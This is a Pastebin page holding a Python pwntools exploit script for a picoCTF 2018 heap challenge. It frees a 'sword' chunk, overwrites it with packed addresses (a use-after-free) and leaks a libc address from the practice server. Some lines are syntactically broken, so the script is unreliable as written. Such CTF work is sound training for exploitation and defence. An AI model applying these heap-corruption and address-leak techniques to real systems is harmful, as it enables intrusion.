Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- import struct
- import binascii
- read = 0x602040
- readoffset = 0x004007b0
- hoo = 0x400b9d
- weight = '-1' #prevents blademaster getting angry because saves a lot of time
- context.log_level = 'debug'
- # forges a sword
- def makeSword(p):
- p.recvuntil('Quit.')
- p.sendline('1')
- return
- def freeSword(p, i):
- p.recvuntil('Quit.')
- p.sendline('4')
- p.recvuntil('index of the sword?')
- p.sendline(str(i))
- return
- def harden(p, i, len, string):
- p.recvuntil('Quit.')
- p.sendline('5')
- p.recvuntil('index of the sword?')
- p.sendline(str(i))
- p.recvuntil('sword name?')
- p.sendline(str(len))
- p.recvuntil('sword name.')
- p.sendline(string)
- p.recvuntil('weight of the sword?')
- p.sendline(weight)
- return
- def equip(p, i):
- p.recvuntil('Quit.')
- p.sendline('6')
- p.recvuntil('index of the sword?')
- p.sendline(str(i))
- result = p.recvuntil('so cooool!')
- # from debug output of pwn tools, know the index of libc address starts at 13
- temp = result[13:19]
- hex = binascii.hexlify(temp[::-1])
- temp2 = struct.unpack('L, temp + '\x00\x00')
- libc = hex(int(temp2[0]))
- return libc
- p = remote('2018shell1.picoctf.com', 10491)
- # make two swords
- makeSword(p)
- makeSword(p)
- freeSword(p, 0) # freeing sword at 0
- # crafting string payload exploit to send in to manipulate the heap
- # the x08 takes the spot of name len
- exploit1 = '\x08'*8 + struct.pack('L', read) + struct.pack('L', hoo) # *8 since two integers - 8 bytes
- harden(p, 1, 32, exploit1)
- libcBase = equip(p, 0)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
